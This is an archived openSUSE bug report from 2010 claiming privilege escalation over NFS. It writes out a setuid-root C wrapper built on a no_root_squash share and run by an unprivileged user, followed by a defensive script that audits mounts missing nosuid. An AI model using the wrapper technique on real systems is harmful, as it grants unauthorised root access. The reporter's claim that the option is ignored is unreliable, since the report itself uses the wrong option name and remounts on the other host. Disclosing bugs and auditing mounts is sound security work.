Mailinglist Archive: opensuse-bugs (4671 mails)

[Bug 640601] New: Priv Gain thru NFS - suspect mount nosetuid being bypassed
  • From: bugzilla_noreply@xxxxxxxxxx
  • Date: Mon, 20 Sep 2010 18:07:43 +0000
  • Message-id: <bug-640601-21960@xxxxxxxxxxxxxxxxxxxxxxxx/>

https://bugzilla.novell.com/show_bug.cgi?id=640601

https://bugzilla.novell.com/show_bug.cgi?id=640601#c0


Summary: Priv Gain thru NFS - suspect mount nosetuid being bypassed
Classification: openSUSE
Product: openSUSE 11.2
Version: Final
Platform: x86-64
OS/Version: openSUSE 11.2
Status: NEW
Severity: Critical
Priority: P5 - None
Component: Security
AssignedTo: security-team@xxxxxxx
ReportedBy: p.chiu@xxxxxxxx
QAContact: qa@xxxxxxx
Found By: ---
Blocker: ---


User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; (R1 1.6); SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; AskTbBLT/5.8.0.12304)

We allow a software engineer user with sudo (all) access on one openSUSE 11.2
server called ServerA.

We also mount storage from ServerB (another openSUSE 11.2 system) using NFS
to allow full access for some applications (i.e. with no_root_squash enabled).

mount serverB:/serverB /serverB
mount -o remount,nosetuid serverB:/serverB /serverB
mount | grep serverB
serverB:/serverB on /serverB type nfs (rw,remount,nosetuid,address=192.168.123.1,nfsvers=3,proto=tcp,mountproto=udp)

The user then logs on serverA.

sudo mkdir /serverB/test
cd /serverB/test
sudo vi script1.c to contain
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    setuid( 0 );
    system( "./script2.sh" );

    return 0;
}

sudo cc -o script1.o script1.c
sudo chmod 4755 script1.o
sudo vi script2.sh to contain
mkdir /abcd

sudo chmod 755 script2.sh
ls -ls
pcmc@aspre:/mnt/holly1/test> ls -ls
total 20
4 -rw-r--r-- 1 root root 158 2010-09-20 18:25 script1.c
12 -rwsr-xr-x 1 root root 11942 2010-09-20 18:27 script1.o
4 -rwxr-xr-x 1 root root 12 2010-09-20 18:26 script2.sh

Now, any unprivileged user on serverB will be able to obtain root privileges
by invoking the program script1.o.

For instance, logged on serverB,
su - lp
ls -lsd /abcd will show
ls: cannot access /abcd: No such file or directory
cd /serverB/test
./script1.o
ls -lsd /abcd
4 drwxr-xr-x 2 root lp 4096 2010-09-20 18:31 /abcd

Imagine what you can put inside script2.sh!!!

It appears that the mount nosetuid option is ignored.


Reproducible: Always

Steps to Reproduce:
1. as stated above
Actual Results:
as described above

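Added example, not part of the bug report: on Linux the mount option that disables set-user-ID execution is `nosuid`, and the kernel applies it per mount on the host that executes the file. The script below lists NFS mounts that lack it (read from lines in /proc/mounts format) and inventories set-user-ID files under a directory such as an export path; the function names and the sample mount lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the bug report). Input lines use the /proc/mounts
# layout: device mountpoint fstype options dump pass.

# Print "mountpoint fstype" for every NFS mount whose options lack nosuid.
# $1: file in /proc/mounts format (default: /proc/mounts).
nfs_without_nosuid() {
    awk '$3 == "nfs" || $3 == "nfs4" {
        n = split($4, opt, ","); found = 0
        for (i = 1; i <= n; i++) if (opt[i] == "nosuid") found = 1
        if (!found) print $2, $3
    }' "${1:-/proc/mounts}"
}

# List regular files carrying the set-user-ID bit under a directory, staying
# on one filesystem. Run it on the exporting server against the export path.
# $1: directory to scan.
setuid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Constructed sample input; hostnames and paths are illustrative only.
sample_mounts() {
    cat <<'EOF'
/dev/sda2 / ext4 rw,relatime 0 0
serverB:/serverB /serverB nfs rw,relatime,vers=3,proto=tcp 0 0
serverC:/data /data nfs4 rw,nosuid,nodev,vers=4 0 0
EOF
}

# Run the mount check against the constructed sample.
demo() {
    tmp=$(mktemp) || return 1
    sample_mounts > "$tmp"
    nfs_without_nosuid "$tmp"    # prints: /serverB nfs
    rm -f "$tmp"
}
demo
```

Called with no argument, `nfs_without_nosuid` reads the live /proc/mounts, which shows the options the kernel is actually enforcing rather than what was typed on the mount command line.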
